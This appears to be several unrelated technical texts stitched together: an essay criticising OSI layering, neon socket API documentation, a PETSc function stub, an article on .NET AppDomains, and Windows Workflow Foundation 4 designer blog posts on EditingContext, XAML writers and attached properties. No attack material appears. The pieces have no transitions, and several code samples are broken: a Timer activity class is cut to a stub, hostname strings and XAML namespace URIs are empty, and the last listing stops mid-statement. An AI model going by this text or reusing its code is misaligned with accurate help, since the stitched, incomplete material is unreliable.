The OSI Model is often criticised as being overly complex, offering too many choices. It is usually contrasted with the Internet, or TCP/IP, protocol suite by such critics. It is hard to separate the implementation from the specification when analysing these criticisms. For example, the idea that there are too many layers simply does not hold water. A TP4/CLNP implementation (the ISO Connection Oriented Transport Protocol in its appropriate class, running over the ISO datagram network protocol) could be almost exactly as efficient as a TCP/IP one; indeed there exist implementations that are. The model has its use as a reference to compare different protocol systems, and should be considered a major success as that model. The ISO protocols that instantiate the model in ISO stacks are a completely separate matter.

The concept of layers introduced in the OSI model has two motivations:
- Primarily technically, but secondarily politically, it is a modularisation technique, taken from software engineering and re-applied to the systems engineering of communications architectures (a term used instead of model).
- Secondarily technically, but primarily politically, each layer (module) can be implemented by a different supplier, to a service specification, and must only rely on the service specifications of other layers (modules).

Why has this approach gone astray? For two reasons (at least), one technical and the other political:
- The layering imposed politically essentially reflects a protectionist approach to providers, such as PTTs, software and hardware vendors. But the world has moved on, and now we have much more mix and match, and the walls between types of provider have been broken down. Now, you might get your host from an entertainment company, your operating system from a PTT (e.g. Unix from AT&T), the communications software from a university (TCP/IP on a PC from UCL), and so forth.
- Software (and other) engineering has moved on a bit, and now software re-use (through object-oriented and other techniques) means that we can take pieces of code in other people's products and efficiently and safely adapt them to our requirements. A concrete, trivial example might be the use of bcopy (memcopy) by anyone in any layer of Unix applications, despite its being designed for the OS originally, with overloaded assignment in C++ perhaps being a better way to present it to the programmer - but what we don't have is millions of different copy functions, one for each layer of software.

Basically, the layer/service model is like an extreme version of Pascal where you can only declare functions local to their use, and they can therefore only be used there! Of course, the opposite extreme of C (all functions are global) may be too anarchic as well, although that argument is really to do with managing type complexity rather than the function namespace size.
#include <ne_socket.h>
The hostname passed to ne_addr_resolve can be a DNS hostname (e.g. "") or an IPv4 dotted quad (e.g. "192.0.34.72"); or, on systems which support IPv6, an IPv6 hex address, which may be enclosed in brackets, e.g. "[::1]".
To determine whether the hostname was successfully resolved, the ne_addr_result function is used, which returns non-zero if an error occurred. If an error did occur, the ne_addr_error function can be used, which will copy the error string into a given buffer (of size bufsiz).
The functions ne_addr_first and ne_addr_next are used to retrieve the Internet addresses associated with an address object which has been successfully resolved. ne_addr_first returns the first address; ne_addr_next returns the next address after the most recent call to ne_addr_next or ne_addr_first, or NULL if there are no more addresses. The ne_inet_addr pointer returned by these functions can be passed to ne_sock_connect to connect a socket.
After the address object has been used, it should be destroyed using ne_addr_destroy.
ne_addr_resolve returns a pointer to an address object, and never NULL. ne_addr_error returns the buffer parameter.
The code below prints out the set of addresses associated with the hostname.
ne_sock_addr *addr;
char buf[256];

addr = ne_addr_resolve("", 0);
if (ne_addr_result(addr)) {
    printf("Could not resolve: %s\n", ne_addr_error(addr, buf, sizeof buf));
} else {
    const ne_inet_addr *ia;
    printf(":");
    for (ia = ne_addr_first(addr); ia != NULL; ia = ne_addr_next(addr)) {
        printf(" %s", ne_iaddr_print(ia, buf, sizeof buf));
    }
    putchar('\n');
}
ne_addr_destroy(addr);
ne_iaddr_print
Joe Orton <neon@lists.manyfish.co.uk>
#include "petscksp.h"
PetscErrorCode MatGetSchurComplement(Mat mat, IS isrow0, IS iscol0, IS isrow1, IS iscol1,
                                     MatReuse mreuse, Mat *newmat, MatReuse preuse, Mat *newpmat)

Collective on Mat
Sometimes users would like to provide problem-specific data in the Schur complement, usually only for special row and column index sets. In that case, the user should call PetscObjectComposeFunction() to set "MatNestGetSubMat_C" to their function. If their function needs to fall back to the default implementation, it should call MatGetSchurComplement_Basic().
Level: advanced
Location: src/ksp/ksp/utils/schurm.c
A colleague recently approached me about the concept of an application domain within ASP.NET. It took a minute to jog my memory about this security feature in the .NET Framework. If you could use a refresher on application domains, here's a quick overview of the concept.
What is it?
The Application Domain, known as AppDomain, provides a sandbox for .NET applications. An AppDomain is a container, or secure boundary, for code and data used by the .NET runtime. It is analogous to an operating system process used for an application and its data. The code and data is securely isolated within the boundaries of an AppDomain.
The goal of an AppDomain is to isolate the applications within it from all other application domains. That is, applications are protected from being affected by other applications running in different application domains. It provides stability.
This isolation of AppDomains is achieved by making sure exactly one application occupies unique parts of memory and scopes the resources for the process or application domain using that address space. The .NET runtime enforces AppDomain isolation by controlling memory usage. Application domains run on a single Win32 process. All AppDomain memory is managed by the runtime to ensure no overlap in memory usage.
It may seem like there is one AppDomain for every application, but the .NET Common Language Runtime (CLR) allows multiple applications to run within a single AppDomain. The CLR also verifies that the user code in an AppDomain is type safe. An assembly must be loaded into an AppDomain before it can execute. By default, the CLR loads an assembly into the AppDomain containing the code that references it.
The CLR automatically creates a default AppDomain when a process that hosts the CLR is created. This default AppDomain exists as long as the host process is alive. A good example of hosting the CLR is IIS.
ASP.NET
When a request first enters an ASP.NET application, the IIS-managed engine module creates an application domain; then the application domain performs the necessary processing tasks for the application, such as authentication.
When dealing with multiple ASP.NET applications on a server, the ASP.NET worker process will host all of them, but each one will have its own AppDomain. This ensures that each application is protected from problems in another application. In addition, each application has its own set of global variables. Even though the code for both of the applications resides inside the same process, the unit of isolation is the .NET AppDomain.
An interesting caveat with ASP.NET and application domains is the fact that ASP.NET applications run with full trust rights by default. Applications running with full trust can execute native code and circumvent all security checks by the .NET runtime, so the security boundary provided by the application domain is moot. You can override the default behavior and run applications with partial trust to overcome this issue.
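In ASP.NET itself, the trust level is normally dialed down declaratively (through the trust element in web.config) rather than in code, but the same idea can be sketched programmatically. The following is only an illustrative sketch, assuming the .NET Framework 4 sandboxing overload of CreateDomain; the domain name, directory path, and choice of granted permissions are hypothetical and not taken from this article.

using System;
using System.Security;
using System.Security.Permissions;

class SandboxExample
{
    static void Main()
    {
        // Grant only the bare minimum: permission to execute managed code.
        PermissionSet grantSet = new PermissionSet(PermissionState.None);
        grantSet.AddPermission(new SecurityPermission(SecurityPermissionFlag.Execution));

        // Root the sandboxed domain at a directory (hypothetical path).
        AppDomainSetup setup = new AppDomainSetup();
        setup.ApplicationBase = @"C:\SandboxedApp";

        // Assemblies loaded into this domain run with partial trust: they can
        // execute, but they cannot call native code or bypass runtime checks.
        AppDomain sandbox = AppDomain.CreateDomain("PartialTrustSandbox", null, setup, grantSet);

        Console.WriteLine("Created domain: " + sandbox.FriendlyName);

        // Untrusted code would typically be loaded into the sandbox here,
        // for example through a MarshalByRefObject-derived bridge class.

        AppDomain.Unload(sandbox);
    }
}

The key point of the sketch is the PermissionSet passed to CreateDomain: that grant set, rather than the default full-trust grant, becomes the ceiling for everything that runs inside the new domain.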
It is easy to see the benefits of the AppDomain concept, as applications are protected from harming others. It is great for ASP.NET hosting providers to protect customer applications from each other. In addition, the .NET Framework provides programmatic access to the application domain concept.
Programmatic access
You can find the AppDomain class in the base System namespace. The Microsoft documentation offers guidelines for using the AppDomain class.
The AppDomain class allows you to create and manipulate your own application domains based upon your needs. The CreateDomain method is available to create a new application domain. The following C# snippet creates a new application domain and executes an assembly within the new application domain.
AppDomain domain = AppDomain.CreateDomain("TestAppDomain");
domain.ExecuteAssembly("AssemblyName.exe", null, args);
Console.WriteLine(AppDomain.CurrentDomain.FriendlyName);
In addition to creating a new application domain, the AppDomain class provides methods and properties for working with new and existing application domains.
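As a small, self-contained illustration of a few of those members (the domain name below is arbitrary and the example is not taken from the article), the following console sketch creates a second domain, reads a couple of its properties, lists the assemblies loaded into the default domain, and then unloads the new domain.

using System;
using System.Reflection;

class AppDomainInfoExample
{
    static void Main()
    {
        // Create a second application domain alongside the default one.
        AppDomain worker = AppDomain.CreateDomain("WorkerDomain");

        // A couple of the properties an application domain exposes.
        Console.WriteLine("Name: " + worker.FriendlyName);
        Console.WriteLine("Base directory: " + worker.BaseDirectory);

        // List every assembly currently loaded into the default domain.
        foreach (Assembly asm in AppDomain.CurrentDomain.GetAssemblies())
        {
            Console.WriteLine(asm.FullName);
        }

        // Unloading the domain releases the code and data it isolated.
        AppDomain.Unload(worker);
    }
}

Note that the default domain itself can never be unloaded; AppDomain.Unload applies only to domains you create.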
This comprehensive list of online samples shows you how to work with the current application domain and interact with other application domains.
Protection
Application domains are an essential feature of the .NET platform because they isolate applications from each other; this prevents problems in one application from affecting others running on the same platform. In addition, the AppDomain class allows you to create your own application domains to isolate tasks for various scenarios.
|
http://www.techrepublic.com/blog/software-engineer/add-stability-to-your-aspnet-applications-with-appdomains/429/
|
CC-MAIN-2014-10
|
en
|
refinedweb
|
I think that there is a pretty nice mix of Hadoop, Microsoft plans, and applications across these sessions. Hope you get a chance to see them (or watch them after the events!)
I’ve been hard at work here in Redmond (and with our team in Shanghai) working on getting WF ready for release. We’ve made a ton of progress in the RC build that was made available yesterday, please download it and check it out. Also, and in important bold text, if you have feedback, please, please, please file an issue on Connect so that the team can look at it right away. One thing that I want to point out about Connect is that it is not a vacuum, the entries there go directly into our bug tracking system, which we look at daily in our various shiproom meetings. If something isn’t working right, please let us know!
We’ve fixed a number of issues that came directly from Connect in this last milestone, including some areas that revealed some gaps in our testing. Your feedback is making this better. For bugs that we’ve marked as postponed, as we start planning for vNext, we will start going through those to figure out the areas we need to improve on.
We're in the home stretch: this morning I presented to our support team to get them prepared to handle any PSS incidents that occur. It's great to see the release coming together.
Let’s start with some simple code (this is from a demo that I showed in my PDC talk). This is a timer activity which allows us to time the execution for the contained activity and then uses an activity action to act on the result.
using System.Collections.Generic;
using System.Linq;
using System.Text;
namespace CustomActivities.ActivityTypes
public sealed class Timer : NativeActivity<TimeSpan>
public Timer()
A few things to note about this code sample:
This is part 6 of my 6-part series on the EditingContext.
I want to wrap up this series of posts by posting some code for an activity designer that functions more as a diagnostic tool, and will display all of the Items and services of the EditingContext within the designer. This will be useful from an investigation perspective, and hopefully as a diagnostic tool. We will use this to help us understand what are the services that are available out of the box in VS, as well as in a rehosted application.
We first need to create an empty activity to attach a designer to.
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Activities;
using System.ComponentModel;
namespace blogEditingContext
{
[Designer(typeof(DiagnosticDesigner))]
public sealed class Diagnosticator : CodeActivity
    {
        protected override void Execute(CodeActivityContext context)
        {
}
}
}
Now, let’s create our designer. We could do fancy treeviews or object browser style UI’s, but as this is a blog post, I want to provide you with the basics, and then let you figure out how that is most useful to you. So, we will just create a designer that writes out to debug output the relevant information.
<sap:ActivityDesigner x:Class="blogEditingContext.DiagnosticDesigner"
xmlns=""
xmlns:x=""
xmlns:sap="clr-namespace:System.Activities.Presentation;assembly=System.Activities.Presentation"
xmlns:
<Grid>
<Button Click="Button_Click">Debug.WriteLine Context Data</Button>
</Grid>
</sap:ActivityDesigner>
And now the code
using System.Diagnostics;
using System.Linq;
using System.Windows;
namespace blogEditingContext
{
// Interaction logic for DiagnosticDesigner.xaml
public partial class DiagnosticDesigner
{
public DiagnosticDesigner()
{
InitializeComponent();
}
private void Button_Click(object sender, RoutedEventArgs e)
{
// the goal here is to output meaningful and useful information about
// the contents of the editing context here.
int level = Debug.IndentLevel;
Debug.WriteLine("Items in the EditingContext");
Debug.IndentLevel++;
foreach (var item in Context.Items.OrderBy(x => x.ItemType.ToString()))
{
Debug.WriteLine(item.ItemType);
}
Debug.IndentLevel = level;
Debug.WriteLine("Services in the EditingContext");
foreach (var service in Context.Services.OrderBy(x => x.ToString()))
{
Debug.WriteLine(service);
}
}
}
}
Let's break this down. The work here happens in the button click where we simply order by types' string representations and output them to the debug writer (a more robust implementation might use a trace writer that could be configured in the app, but for this purpose, this will be sufficient).
So, what output do we get?
We determine this by using the activity in a freshly opened WF project
System.Activities.Presentation.Hosting.AssemblyContextControlItem
System.Activities.Presentation.Hosting.ReadOnlyState
System.Activities.Presentation.Hosting.WorkflowCommandExtensionItem
System.Activities.Presentation.View.Selection
System.Activities.Presentation.WorkflowFileItem
System.Activities.Presentation.Debug.IDesignerDebugView
System.Activities.Presentation.DesignerPerfEventProvider
System.Activities.Presentation.FeatureManager
System.Activities.Presentation.Hosting.ICommandService
System.Activities.Presentation.Hosting.IMultiTargetingSupportService
System.Activities.Presentation.Hosting.WindowHelperService
System.Activities.Presentation.IActivityToolboxService
System.Activities.Presentation.IIntegratedHelpService
System.Activities.Presentation.IWorkflowDesignerStorageService
System.Activities.Presentation.IXamlLoadErrorService
System.Activities.Presentation.Model.AttachedPropertiesService
System.Activities.Presentation.Model.ModelTreeManager
System.Activities.Presentation.Services.ModelService
System.Activities.Presentation.Services.ViewService
System.Activities.Presentation.UndoEngine
System.Activities.Presentation.Validation.IValidationErrorService
System.Activities.Presentation.Validation.ValidationService
System.Activities.Presentation.View.ActivityTypeDesigner+DisplayNameUpdater
System.Activities.Presentation.View.DesignerView
System.Activities.Presentation.View.IExpressionEditorService
System.Activities.Presentation.View.ViewStateService
System.Activities.Presentation.View.VirtualizedContainerService
This wraps up our series on the editing context. We've gone through the basics of why we need it and what we can do with it, and then we moved on to how to use it, from the very simple to the very complex. We've finished with a diagnostic tool to help understand what items and services are available to bind to.
What’s Next From Here?
A few ideas for the readers who have read all of these:
Thanks for now!
This is part 4 of my 6-part series on the EditingContext.
In addition to having a host provide an instance of a type to be used within the designer, it can also be used to pass an instance that will route callbacks to the host. I covered this briefly in a previous post (Displaying Validation Errors in a Rehosted WF4 Designer). In that case, we provide an implementation of IValidationErrorService, which the designer infrastructure will call, if available, towards the end of a completion of a validation episode. In the sample application in that post, we use that instance to route, and display the validation errors in the system.
Rather than duplicate the code, I will simply encourage you to check out that post and think about the way you could publish a service that your activity designers know about, and use it as a mechanism for calling methods within the hosting application.
I want to briefly touch on the editing context and give a little introduction to its capabilities. This is part 1 of a 6 part series
The way to think about the editing context is that it is the point of contact between the hosting application, and the designer (and elements on the designer). In my PDC talk, I had the following slide which I think captures the way to think about how these elements are layered together.
The editing context represents a common boundary between the hosting application and the designer, and the mechanism to handle interaction with the designer (outside of the most common methods that have been promoted on WorkflowDesigner). If you were to look at the implementation of some of the more common methods on WorkflowDesigner, you would see that almost all of these use the editing context in order to get anything done. For instance, the Flush method (and Save, which calls Flush) will acquire an IDocumentPersistenceService from the Services collection, and then use that in order to properly serialize the document.
The EditingContext type has two important properties: Items and Services.
The Items collection is for data that is shared between the host and the designer, or data that is available to all designers. These need to derive from ContextItem, which provides the mechanism to hook into subscription and change notification. There are a couple of interesting methods on the ContextItemManager type, such as GetValue(), SetValue() and Subscribe().
Services represent functionality that is either provided by the host for the designer to use, or is used by the designer to make functionality available to all designers within the editor. Generally, these are likely defined as interfaces, but can also be a type. It is then required for an implementation or an instance to be provided. This instance will be shared as a singleton. There are a few interesting methods on the ServiceManager type, such as Publish(), GetService() and Subscribe().
We’ll start walking through these over the next few posts.
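In the meantime, here is a small, hedged C# sketch of both halves (IStatusService and ConsoleStatusService are made-up illustrations, not framework types), showing a host publishing a service and designer-side code consuming it and subscribing to the built-in Selection context item:

using System.Activities.Presentation;
using System.Activities.Presentation.View;

public interface IStatusService
{
    void Report(string message);
}

public class ConsoleStatusService : IStatusService
{
    public void Report(string message) { System.Console.WriteLine(message); }
}

public static class EditingContextSketch
{
    public static void Wire(EditingContext context)
    {
        // The host publishes an implementation; designers resolve it later.
        context.Services.Publish<IStatusService>(new ConsoleStatusService());

        // Designer-side code asks for the service when it needs it.
        IStatusService status = context.Services.GetService<IStatusService>();
        status.Report("service resolved");

        // Context items support change subscription; Selection is a built-in item.
        context.Items.Subscribe<Selection>(
            selection => status.Report("selection count: " + selection.SelectionCount));
    }
}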
Frequent forum guest Notre posed this question to the forums the other day noting that the XAML being produced from ActivityXamlServices.CreateBuilderWriter() was slightly different than the XAML being output from WorkflowDesigner.Save(). The reason for this stems from the fact that WorkflowDesigner leverages an additional internal type (which derives from XamlXmlWriter) in order to attach the mc:Ignorable attribute.
From the source at MSDN:.
Basically, this lets a XAML reader gracefully ignore any content marked from that namespace if it cannot be resolved. So, imagine a runtime scenario where we don’t want to load System.Activities.Presentation every time we read a WF XAML file that may contain viewstate. As a result, we use mc:Ignorable, which means the reader will skip that content when it does not have that assembly referenced at runtime.
This is what the output from the designer usually contains:
<Sequence
mc:Ignorable="sap"
mva:VisualBasic.Settings="Assembly references and imported namespaces serialized as XML namespaces"
xmlns=""
xmlns:mc=""
xmlns:mva="clr-namespace:Microsoft.VisualBasic.Activities;assembly=System.Activities"
xmlns:sap=""
xmlns:scg="clr-namespace:System.Collections.Generic;assembly=mscorlib"
xmlns:
<sap:WorkflowViewStateService.ViewState>
<scg:Dictionary x:
<x:Boolean x:True</x:Boolean>
</scg:Dictionary>
</sap:WorkflowViewStateService.ViewState>
<Persist sap:VirtualizedContainerService.
<Persist sap:VirtualizedContainerService.
<WriteLine sap:VirtualizedContainerService.
</Sequence>
mc:Ignorable will cause the ViewState and HintSize to be ignored.
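In practice, that means a runtime host can load and execute this XAML without referencing the designer assembly at all. A hedged sketch (the file name is illustrative; ActivityXamlServices lives in System.Activities.XamlIntegration):

// The reader skips the sap:-prefixed view state because it is marked mc:Ignorable.
Activity workflow = ActivityXamlServices.Load("Workflow.xaml");
WorkflowInvoker.Invoke(workflow);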
If you use WorkflowDesigner.Save(), you don't need to do anything extra. If you want to serialize the ActivityBuilder yourself and produce XAML matching what the designer produces, you will need to add a XamlXmlWriter into the XamlWriter stack in order to get the right output. You may also care about this if you are implementing your own storage and plan on writing additional XAML readers or writers for extra extensibility and flexibility.
The code below describes the same approach you would need to take to implement an XamlXmlWriter that does the same thing our internal type does. While I can’t copy and paste code, this does the same thing. We do two things:
What namespaces do we ignore in the designer? Just one:
using System.Collections.Generic;
using System.IO;
using System.Xaml;
using System.Xml;

namespace IgnorableXamlWriter
{
    class IgnorableXamlXmlWriter : XamlXmlWriter
    {
        HashSet<NamespaceDeclaration> ignorableNamespaces = new HashSet<NamespaceDeclaration>();
        HashSet<NamespaceDeclaration> allNamespaces = new HashSet<NamespaceDeclaration>();
        bool objectWritten;
        bool hasDesignNamespace;
        string designNamespacePrefix;

        public IgnorableXamlXmlWriter(TextWriter tw, XamlSchemaContext context)
            : base(XmlWriter.Create(tw,
                       new XmlWriterSettings { Indent = true, OmitXmlDeclaration = true }),
                   context,
                   new XamlXmlWriterSettings { AssumeValidInput = true })
        {
        }

        public override void WriteNamespace(NamespaceDeclaration namespaceDeclaration)
        {
            if (!objectWritten)
            {
                allNamespaces.Add(namespaceDeclaration);
                // if we find the designer namespace, remember it and its prefix.
                // if you had a broader set of things to ignore, you would collect
                // those here.
                if (namespaceDeclaration.Namespace ==
                    "http://schemas.microsoft.com/netfx/2009/xaml/activities/presentation")
                {
                    hasDesignNamespace = true;
                    designNamespacePrefix = namespaceDeclaration.Prefix;
                }
            }
            base.WriteNamespace(namespaceDeclaration);
        }

        public override void WriteStartObject(XamlType type)
        {
            // we should check if we should ignore
            if (hasDesignNamespace)
            {
                // note this is not robust, as the prefix "mc" could naturally occur
                string mcAlias = "mc";
                this.WriteNamespace(
                    new NamespaceDeclaration(
                        "http://schemas.openxmlformats.org/markup-compatibility/2006",
                        mcAlias));
                base.WriteStartObject(type);
                XamlDirective ig = new XamlDirective(
                    "http://schemas.openxmlformats.org/markup-compatibility/2006",
                    "Ignorable");
                WriteStartMember(ig);
                WriteValue(designNamespacePrefix);
                WriteEndMember();
            }
            else
            {
                base.WriteStartObject(type);
            }
            objectWritten = true;
        }
    }
}
One note on the code above, it is noted that the generation of the namespace prefix “mc” is not robust. In the product code we will check to see if mc1, mc2, … are available up to mc1000. In that case we would then append a GUID for the ugliest XML namespace known to mankind. The chance of collision up to 1000 would be a highly extreme edge case.
How would I use this? The following code shows feeding this into a CreateBuilderWriter that is passed to XamlServices.Save()
StringBuilder sb = new StringBuilder();
XamlSchemaContext xsc = new XamlSchemaContext();
var bw = ActivityXamlServices.CreateBuilderWriter(
new IgnorableXamlXmlWriter(new StringWriter(sb), xsc));
XamlServices.Save(bw,
wd.Context.Services.GetService<ModelTreeManager>().Root.GetCurrentValue());
I’ve been meaning to throw together some thoughts on attached properties and how they can be used within the designer. Basically, you can think about attached properties as injecting some additional “stuff” onto an instance that you can use elsewhere in your code.
In the designer, we want to be able to have behavior and view tied to interesting aspects of the data. For instance, we would like to have a view updated when an item becomes selected. In WPF, we bind the style based on the "isSelectionProperty." Now, our data model doesn't have any idea of selection; it's something we'd like the view layer to "inject" onto any model item so that a subsequent view can take advantage of it. You can think of attached properties as nice syntactic sugar that saves you from keeping a bunch of lookup lists around. Since things like WPF bind to the object very well, and not so much to a lookup list, this ends up being an interesting model.
To be clear, you could write a number of value converters that take the item being bound, look up in a lookup list somewhere, and return the result that will be used. The problem we found is that we were doing this in a bunch of places, and we really wanted to have clean binding statements inside our WPF XAML, rather than hiding a bunch of logic in the converters.
First, some types.
in diagram form:
One thing that might look a little funny to some folks who have used attached properties in other contexts (WF3, WPF, XAML), is the “IsBrowsable” property. The documentation is a little sparse right now, but what this will do is determine how discoverable the property is. If this is set to true, the attached property will show up in the Properties collection of the ModelItem to which the AP is attached. What this means is that it can show up in the Property grid, you can bind WPF statements directly to it, as if it were a real property of the object. Attached properties by themselves have no actual storage representation, so these exist as design time only constructs.
One other thing that you see on the AttachedProperty<T> is the Getter and Setter properties. These are of type Func<ModelItem,T> and Action<ModelItem,T> respectively. What these allow you to do is perform some type of computation whenever the get or set is called against the AttachedProperty. Why is this interesting? Well, let’s say that you’d like to have a computed value retrieved, such as “IsPrimarySelection” checking with the Selection context item to see if an item is selected. Or, customizing the setter to either store the value somewhere more durable, or updating a few different values. The other thing that happens is that since all of these updates go through the ModelItem tree, any changes will be propagated to other listeners throughout the designer.
Here is a very small console based app that shows how you can program against the attached properties. An interesting exercise for the reader would be to take this data structure, put it in a WPF app and experiment with some of the data binding.
First, two types:
public class Dog
{
public string Name { get; set; }
public string Noise { get; set; }
public int Age { get; set; }
}
public class Cat
{
public string Name { get; set; }
public string Noise { get; set; }
public int Age { get; set; }
}
Note that there is no common base type; that actually makes this a little more interesting, as we will see.
Now, let's write some code. First, let's initialize an EditingContext and a ModelTreeManager.
1: static void Main(string[] args)
2: {
3: EditingContext ec = new EditingContext();
4: ModelTreeManager mtm = new ModelTreeManager(ec);
5: mtm.Load(new object[] { new Dog { Name = "Sasha", Noise = "Snort", Age = 5 },
6: new Cat { Name="higgs", Noise="boom", Age=1 } });
7: dynamic root = mtm.Root;
8: dynamic dog = root[0];
9: dynamic cat = root[1];
10: ModelItem dogMi = root[0] as ModelItem;
11: ModelItem catMi = root[1] as ModelItem;
Note, lines 7-9 will not work in Beta2 (preview of coming attractions). To get lines 10-11 working in beta2, cast root to ModelItemCollection and then use the indexers to extract the values
Now, let’s build an attached property, and we will assign it only to type “dog”
1: // Add an attached Property
2: AttachedProperty<bool> ap = new AttachedProperty<bool>
3: {
4: IsBrowsable = true,
5: Name = "IsAnInterestingDog",
6: Getter = (mi => mi.Properties["Name"].ComputedValue.ToString() == "Sasha"),
7: OwnerType = typeof(Dog)
8: };
9: ec.Services.Publish<AttachedPropertiesService>(new AttachedPropertiesService());
10: AttachedPropertiesService aps = ec.Services.GetService<AttachedPropertiesService>();
11: aps.AddProperty(ap);
13: Console.WriteLine("---- Enumerate properties on dog (note new property)----");
14: dogMi.Properties.ToList().ForEach(mp => Console.WriteLine(" Property : {0}", mp.Name));
15:
16: Console.WriteLine("---- Enumerate properties on cat (note no new property) ----");
17: catMi.Properties.ToList().ForEach(mp => Console.WriteLine(" Property : {0}", mp.Name));
Let’s break down what happened here.
---- Enumerate properties on dog (note new property)----
Property : Name
Property : Noise
Property : Age
Property : IsAnInterestingDog
---- Enumerate properties on cat (note no new property) ----
Ok, so that’s interesting, we’ve injected a new property, only on the dog type. If I got dogMI.Properties[“IsAnInterestingDog”], I would have a value that I could manipulate (albeit returned via the getter).
Let’s try something a little different:
1: AttachedProperty<bool> isYoungAnimal = new AttachedProperty<bool>
3: IsBrowsable = false,
4: Name = "IsYoungAnimal",
5: Getter = (mi => int.Parse(mi.Properties["Age"].ComputedValue.ToString()) < 2)
6: };
7:
8: aps.AddProperty(isYoungAnimal);
9:
10: // expect to not see isYoungAnimal show up
11: Console.WriteLine("---- Enumerate properties on dog (note isYoungAnimal doesn't appear )----");
12: dogMi.Properties.ToList().ForEach(mp => Console.WriteLine(" Property : {0}", mp.Name));
13: Console.WriteLine("---- Enumerate properties on cat (note isYoungAnimal doesn't appear )----");
14: catMi.Properties.ToList().ForEach(mp => Console.WriteLine(" Property : {0}", mp.Name));
16: Console.WriteLine("---- get attached property via GetValue ----");
17: Console.WriteLine("getting non browsable attached property on dog {0}", isYoungAnimal.GetValue(dogMi));
18: Console.WriteLine("getting non browsable attached property on cat {0}", isYoungAnimal.GetValue(catMi));
Let’s break this down:
Let’s see the output there:
---- Enumerate properties on dog (note isYoungAnimal doesn't appear )----
---- Enumerate properties on cat (note isYoungAnimal doesn't appear )----
---- get attached property via GetValue ----
getting non browsable attached property on dog False
getting non browsable attached property on cat True
As we can see, we’ve now injected this behavior, and we can extract the value.
Let’s get a little more advanced and do something with the setter. Here, if isYoungAnimal is set to true, we will change the age (it’s a bit contrived, but shows the dataflow on simple objects, we’ll see in a minute a more interesting case).
1: // now, let's do something clever with the setter.
2: Console.WriteLine("---- let's use the setter to have some side effect ----");
3: isYoungAnimal.Setter = ((mi, val) => { if (val) { mi.Properties["Age"].SetValue(10); } });
4: isYoungAnimal.SetValue(cat, true);
5: Console.WriteLine("cat's age now {0}", cat.Age);
Pay attention to what the Setter does now. We create the method through which subsequent SetValue’s will be pushed. Here’s that output:
---- let's use the setter to have some side effect ----
cat's age now 10
Finally, let's show an example of how this can really function as some nice sugar to eliminate the need for a lot of value converters in WPF by using this capability as a way to store the relationship somewhere (rather than just using it as a nice proxy to change a value):
1: // now, let's have a browesable one with a setter.
2: // this plus dynamics are a mini "macro language" against the model items
3:
4: List<Object> FavoriteAnimals = new List<object>();
5:
6: // we maintain state in FavoriteAnimals, and use the getter/setter func
7: // in order to query or edit that collection. Thus changes to an "instance"
8: // are tracked elsewhere.
9: AttachedProperty<bool> isFavoriteAnimal = new AttachedProperty<bool>
10: {
11: IsBrowsable = false,
12: Name = "IsFavoriteAnimal",
13: Getter = (mi => FavoriteAnimals.Contains(mi)),
14: Setter = ((mi, val) =>
15: {
16: if (val)
17: FavoriteAnimals.Add(mi);
18: else
20: FavoriteAnimals.Remove(mi);
22: })
23: };
24:
25:
26: aps.AddProperty(isFavoriteAnimal);
27:
28: dog.IsFavoriteAnimal = true;
29: // remove that cat that isn't there
30: cat.IsFavoriteAnimal = false;
31: cat.IsFavoriteAnimal = true;
32: cat.IsFavoriteAnimal = false;
33:
34: Console.WriteLine("Who are my favorite animal?");
35: FavoriteAnimals.ForEach(o => Console.WriteLine((o as ModelItem).Properties["Name"].ComputedValue.ToString()));
Little bit of code, let’s break it down one last time:
-- Who are my favorite animals?
Sasha
I will attach the whole code file at the bottom of this post, but this shows you how you can use the following:
Hopefully this post gave you some ideas about how the attached property mechanisms work within the WF4 designer. These give you a nice way to complement the data model and create nice bindable targets that your WPF Views can layer right on top of.
A few ideas for these things:
using System;
using System.Activities.Presentation;
using System.Activities.Presentation.Model;
using System.Collections.Generic;
using System.Linq;
namespace AttachedPropertiesBlogPosting
{
class Program
{
static void Main(string[] args)
{
EditingContext ec = new EditingContext();
ModelTreeManager mtm = new ModelTreeManager(ec);
mtm.Load(new object[] { new Dog { Name = "Sasha", Noise = "Snort", Age = 5 },
new Cat { Name="higgs", Noise="boom", Age=1 } });
dynamic root = mtm.Root;
dynamic dog = root[0];
dynamic cat = root[1];
ModelItem dogMi = root[0] as ModelItem;
ModelItem catMi = root[1] as ModelItem;
// Add an attached Property
AttachedProperty<bool> ap = new AttachedProperty<bool>
{
IsBrowsable = true,
Name = "IsAnInterestingDog",
Getter = (mi => mi.Properties["Name"].ComputedValue.ToString() == "Sasha"),
OwnerType = typeof(Dog)
};
ec.Services.Publish<AttachedPropertiesService>(new AttachedPropertiesService());
AttachedPropertiesService aps = ec.Services.GetService<AttachedPropertiesService>();
aps.AddProperty(ap);
Console.WriteLine("---- Enumerate properties on dog (note new property)----");
dogMi.Properties.ToList().ForEach(mp => Console.WriteLine(" Property : {0}", mp.Name));
Console.WriteLine("---- Enumerate properties on cat (note no new property) ----");
catMi.Properties.ToList().ForEach(mp => Console.WriteLine(" Property : {0}", mp.Name));
AttachedProperty<bool> isYoungAnimal = new AttachedProperty<bool>
{
IsBrowsable = false,
Name = "IsYoungAnimal",
Getter = (mi => int.Parse(mi.Properties["Age"].ComputedValue.ToString()) < 2)
};
aps.AddProperty(isYoungAnimal);
// expect to not see isYoungAnimal show up
Console.WriteLine("---- Enumerate properties on dog (note isYoungAnimal doesn't appear )----");
dogMi.Properties.ToList().ForEach(mp => Console.WriteLine(" Property : {0}", mp.Name));
Console.WriteLine("---- Enumerate properties on cat (note isYoungAnimal doesn't appear )----");
catMi.Properties.ToList().ForEach(mp => Console.WriteLine(" Property : {0}", mp.Name));
Console.WriteLine("---- get attached property via GetValue ----");
Console.WriteLine("getting non browsable attached property on dog {0}", isYoungAnimal.GetValue(dogMi));
Console.WriteLine("getting non browsable attached property on cat {0}", isYoungAnimal.GetValue(catMi));
// now, let's do something clever with the setter.
Console.WriteLine("---- let's use the setter to have some side effect ----");
isYoungAnimal.Setter = ((mi, val) => { if (val) { mi.Properties["Age"].SetValue(10); } });
isYoungAnimal.SetValue(cat, true);
Console.WriteLine("cat's age now {0}", cat.Age);
// now, let's have a browesable one with a setter.
// this plus dynamics are a mini "macro language" against the model items
List<Object> FavoriteAnimals = new List<object>();
// we maintain state in FavoriteAnimals, and use the getter/setter func
// in order to query or edit that collection. Thus changes to an "instance"
// are tracked elsewhere.
AttachedProperty<bool> isFavoriteAnimal = new AttachedProperty<bool>
{
IsBrowsable = false,
Name = "IsFavoriteAnimal",
Getter = (mi => FavoriteAnimals.Contains(mi)),
Setter = ((mi, val) =>
{
if (val)
